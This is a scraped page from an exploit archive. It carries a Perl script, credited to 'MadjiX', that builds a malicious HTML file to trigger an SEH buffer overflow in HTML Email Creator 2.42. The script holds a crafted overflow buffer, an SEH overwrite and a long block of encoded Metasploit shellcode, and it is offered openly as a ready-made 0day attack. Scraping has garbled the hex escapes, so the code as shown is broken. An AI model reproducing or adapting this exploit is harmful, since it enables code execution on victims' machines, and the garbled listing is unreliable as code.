Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)
===============================================================

########################################################################################
# _ #
# .—–.–.–.–.—-.—-.-.—| | #
# | _ | | | | | -__| _ | #
# | __|________|__|__|_____|_____| #
# |__| By MadjiX #
# Sec4ever.com #
########################################################################################
#Title : HTML Email Creator 2.42 build 718 – 0day buffer overflow exploit (SEH) #
#author : MadjiX &lt;Dz8[]Hotmail{}com&gt; #
#Gr33tz : His0k4 , Bibi-info , volc4n0 #
#version 2.3 : http://www.exploit-db.com/exploits/9446/ # by flo flow #
#version 2.1 : http://www.exploit-db.com/exploits/8401/ # by Dun #
########################################################################################
my $file=&quot;madjix.html&quot;;
my $hd2 =&quot;&quot;&gt;n&lt;/BODY&gt;n&lt;/HTML&gt;n&quot;;
my $hd1 =&quot;&lt;HTML&gt;n&lt;HEAD&gt;&lt;/HEAD&gt;n&lt;BODY&gt;n&lt;img src=&quot;&quot; ;
my $buff= &quot;x41&quot; x 56 ;
my $nseh=&quot;xebx11×90x90&quot;;
my $seh= pack(‘V’,0×753DE4BD);
my $nops=&quot;x90&quot; x 24;
# http://www.metasploit.com 4444
my $shellcode =
&quot;x56×54x58×36x33×30x56×58x48×34x39×48x48×48&quot; .
&quot;x50×68x59×41x41×51x68×5ax59×59x59×59x41×41&quot; .
&quot;x51×51x44×44x44×64x33×36x46×46x46×46x54×58&quot; .
&quot;x56×6ax30×50x50×54x55×50x50×61x33×30x31×30&quot; .
&quot;x38×39x49×49x49×49x49×49x49×49x49×49x49×49&quot; .
&quot;x49×49x49×49x49×37x51×5ax6ax41×58x50×30x41&quot; .
&quot;x30×41x6bx41×41x51×32x41×42x32×42x42×30x42&quot; .
&quot;x42×41x42×58x50×38x41×42x75×4ax49×49x6cx4a&quot; .
&quot;x48×4fx79×47x70×47x70×45x50×45x30×4ex69×48&quot; .
&quot;x65×50x31×4ax72×51x74×4cx4bx42×72x44×70x4e&quot; .
&quot;x6bx46×32x44×4cx4cx4bx51×42x45×44x4ex6bx51&quot; .
&quot;x62×47x58×44x4fx48×37x50×4ax46×46x50×31x49&quot; .
&quot;x6fx45×61x4bx70×4ex4cx45×6cx43×51x43×4cx45&quot; .
&quot;x52×46x4cx45×70x49×51x48×4fx44×4dx47×71x4f&quot; .
&quot;x37×48x62×48x70×46x32×42x77×4ex6bx42×72x46&quot; .
&quot;x70×4cx4bx51×52x45×6cx43×31x4ax70×4cx4bx47&quot; .
&quot;x30×50x78×4bx35×49x50×51x64×43x7ax46×61x4a&quot; .
&quot;x70×46x30×4cx4bx47×38x47×68x4ex6bx43×68x47&quot; .
&quot;x50×45x51×4ax73×4ax43×47x4cx51×59x4cx4bx50&quot; .
&quot;x34×4cx4bx47×71x48×56x44×71x49×6fx46×51x4f&quot; .
&quot;x30×4cx6cx49×51x48×4fx44×4dx46×61x4fx37×46&quot; .
&quot;x58×49x70×50x75×49x64×43x33×43x4dx49×68x45&quot; .
&quot;x6bx43×4dx51×34x50×75x4ax42×51x48×4ex6bx50&quot; .
&quot;x58×51x34×43x31×4ax73×43x56×4ex6bx44×4cx42&quot; .
&quot;x6bx4ex6bx51×48x45×4cx47×71x48×53x4ex6bx45&quot; .
&quot;x54×4ex6bx45×51x4ax70×4cx49×51x54×45x74×45&quot; .
&quot;x74×43x6bx51×4bx51×71x50×59x43×6ax46×31x49&quot; .
&quot;x6fx49×70x50×58x43×6fx42×7ax4ex6bx44×52x4a&quot; .
&quot;x4bx4fx76×51x4dx51×78x45×63x50×32x47×70x47&quot; .
&quot;x70×50x68×51x67×44x33×46x52×51x4fx50×54x50&quot; .
&quot;x68×42x6cx50×77x47×56x47×77x4bx4fx4ax75×4e&quot; .
&quot;x58×4ex70×46x61×45x50×47x70×46x49×4fx34×50&quot; .
&quot;x54×46x30×50x68×46x49×4dx50×50x6bx45×50x49&quot; .
&quot;x6fx4bx65×50x50×42x70×42x70×42x70×47x30×50&quot; .
&quot;x50×43x70×46x30×43x58×4ax4ax44×4fx49×4fx4b&quot; .
&quot;x50×4bx4fx48×55x4fx79×49x57×43x58×49x50×4d&quot; .
&quot;x78×47x71×47x71×43x58×46x62×43x30×42x31×51&quot; .
&quot;x4cx4cx49×4dx36×43x5ax46×70x42×76x42×77x45&quot; .
&quot;x38×4ax39×4dx75×44x34×51x71×4bx4fx4ex35×51&quot; .
&quot;x78×43x53×50x6dx45×34x43×30x4bx39×48x63×50&quot; .
&quot;x57×43x67×46x37×50x31×4bx46×51x7ax46×72x42&quot; .
&quot;x79×43x66×4dx32×49x6dx45×36x4fx37×50x44×46&quot; .
&quot;x44×47x4cx46×61x46×61x4cx4dx43×74x44×64x42&quot; .
&quot;x30×4ax66×47x70×51x54×51x44×42x70×46x36×42&quot; .
&quot;x76×51x46×43x76×46x36×50x4ex51×46x43×66x51&quot; .
&quot;x43×50x56×51x78×42x59×48x4cx45×6fx4bx36×49&quot; .
&quot;x6fx4ex35×4ex69×4bx50×50x4ex43×66x51×56x4b&quot; .
&quot;x4fx46×50x50×68x46×68x4ex67×47x6dx45×30x4b&quot; .
&quot;x4fx49×45x4fx4bx4ax50×4cx75×4dx72×43x66×43&quot; .
&quot;x58×4dx76×4ex75×4fx4dx4dx4dx4bx4fx4ax75×47&quot; .
&quot;x4cx43×36x43×4cx44×4ax4dx50×4bx4bx4dx30×43&quot; .
&quot;x45×47x75×4fx4bx50×47x46×73x44×32x50×6fx42&quot; .
&quot;x4ax47×70x46×33x49×6fx4ax75×41x41&quot;;
my $m2d=&quot;x42&quot; x 500 ;
open(MYFILE,’&gt;&gt;MadjiX.html’);
print MYFILE $hd1.$buff.$nseh.$seh.$nops.$shellcode.$m2d.$hd2;
close(MYFILE);

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-29]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13515